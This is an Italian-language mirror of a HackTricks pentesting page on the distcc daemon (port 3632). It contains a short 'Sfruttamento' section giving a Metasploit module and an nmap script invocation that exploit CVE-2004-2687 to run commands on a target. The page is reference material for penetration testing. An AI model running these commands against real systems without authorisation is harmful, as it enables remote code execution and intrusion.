Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00

Translator 704990ddb6 Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

2024-03-11 14:44:50 +00:00

3.4 KiB

Raw Blame History

Impara l'hacking AWS da zero a ero con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

Se desideri vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
Ottieni il merchandising ufficiale PEASS & HackTricks
Scopri La Famiglia PEASS, la nostra collezione di esclusivi NFT
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud repos di github.

Informazioni di Base

Distcc è uno strumento che migliora il processo di compilazione utilizzando la potenza di elaborazione inattiva di altri computer nella rete. Quando distcc è configurato su una macchina, questa macchina è in grado di distribuire i suoi compiti di compilazione a un altro sistema. Questo sistema destinatario deve eseguire il daemon distccd e deve avere un compilatore compatibile installato per elaborare il codice inviato.

Porta predefinita: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Sfruttamento

Verificare se è vulnerabile a CVE-2004-2687 per eseguire codice arbitrario:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Non credo che shodan rilevi questo servizio.

Risorse

Post creato da Álex B (@r1p)

Impara l'hacking AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!